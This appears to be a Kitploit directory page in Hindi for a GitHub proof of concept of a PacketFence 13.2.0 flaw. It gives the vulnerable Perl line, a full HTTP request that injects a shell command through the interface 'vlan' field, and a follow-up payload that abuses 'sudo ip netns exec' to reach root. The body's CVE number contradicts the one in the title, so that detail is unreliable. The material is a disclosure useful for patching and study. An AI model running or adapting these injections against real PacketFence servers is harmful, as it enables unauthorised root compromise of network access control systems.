Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
packetfence-CVE-2024-39024 — Packetfence 13.2.0 में, WebGui इंटरफ़ेस सेटिंग प्रमाणित दूरस्थ कोड निष्पादन की अनुमति देती है। | Kitploit
उपकरण/GitHubGitHub/ly1g3/packetfence-cve-2024-39024
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubly1g3/packetfence-cve-2024-39024

packetfence-CVE-2024-39024

Packetfence 13.2.0 में, WebGui इंटरफ़ेस सेटिंग प्रमाणित दूरस्थ कोड निष्पादन की अनुमति देती है।

रिपॉजिटरी देखें
11 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

परिचय

सुरक्षा शोधकर्ता: ly1g3, ly1g3[at]tuta.io

GPG फिंगरप्रिंट: https://keys.openpgp.org/vks/v1/by-fingerprint/5FE85CE4E8F675F5ABD2C0A33CE8BE447ED6D586

अवलोकन: रिमोट कोड एक्सिक्यूशन - निम्न-स्तरीय प्रमाणित उपयोगकर्ता से एडमिन RCE

CVE: CVE-2024-3924

समयरेखा:

  • खोजा गया - ly1g3
  • रिपोर्ट किया गया - ly1g3
  • ठीक किया गया - packetfence

संदर्भ: https://www.packetfence.com/news/2024/packetfence-14-0-released/

Packetfence प्रमाणित RCE

Packetfence 13.2.0 में, WebGui इंटरफ़ेस सेटिंग प्रमाणित रिमोट कोड एक्सिक्यूशन की अनुमति देती है।

तकनीकी विवरण

प्रमाणित एडमिन से रूट शेल

एडमिन -> कॉन्फ़िगरेशन -> नेटवर्क कॉन्फ़िगरेशन -> इंटरफ़ेस

Interface.pm: function create line 64 वेरिएबल $vlan_id उपयोगकर्ता इनपुट से आता है और केवल क्लाइंट-साइड पर जाँचा जाता है

root@kitploit:~
    my $cmd = "sudo ip link add link $physical_interface name $physical_interface.$vlan_id type vlan id $vlan_id";
    eval { $status = pf_run($cmd) };

POC

burp:

root@kitploit:~
POST /api/v1/config/interfaces HTTP/1.1
Host: 192.168.100.174:1443
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: application/json, text/plain, */*
Accept-Language: en
Accept-Encoding: gzip, deflate
Authorization: Bearer AAAAA
Content-Type: application/json
X-Packetfence-Tenant-Id: 1
Content-Length: 494
Origin: https://192.168.100.174:1443
Referer: https://192.168.100.174:1443/admin
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Dnt: 1
Sec-Gpc: 1
Te: trailers
Connection: close

{"id":"eth0","prefixRouteName":"","type":"none","additional_listening_daemons":[],"address":"10.0.0.1/24","coa":null,"dhcpd_enabled":null,"dns":null,"high_availability":0,"hwaddr":"AA:AA:AA:AA:AA:64","ifindex":"3","ipaddress":"10.0.0.1","ipv6_address":null,"ipv6_prefix":null,"master":"eth0","name":"eth0","nat_enabled":null,"netmask":"255.255.255.0","network":"10.0.0.0","networks":[],"reg_network":null,"split_network":null,"tenant_id":1,"vip":null,"vlan":"$(echo 'win'>> /tmp/perl_log.txt)"}

विशेषाधिकार वृद्धि:

gtfobins

root@kitploit:~
$ sudo -l
Matching Defaults entries for pf on packetfence:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    !requiretty

Runas and Command-specific defaults for pf:
    Defaults!/sbin/ip netns exec * !syslog

User pf may run the following commands on packetfence:
    (root) NOPASSWD: /bin/systemctl, /sbin/iptables, /usr/sbin/ip6tables, /usr/sbin/ipset, /sbin/ipset, /sbin/ip,
        /sbin/vconfig, /sbin/route, /usr/bin/systemctl, /usr/bin/tee, /usr/local/pf/sbin/pfdhcplistener, /bin/kill,
        /usr/sbin/freeradius, /usr/sbin/chroot, /usr/local/pf/bin/pfcmd, /usr/sbin/conntrack, /usr/bin/timedatectl,
        /usr/bin/hostnamectl

root@kitploit:~
"vlan":";sudo /usr/sbin/ip netns exec foo id >> /tmp/perl_log.txt ;",
टूल डाउनलोड करें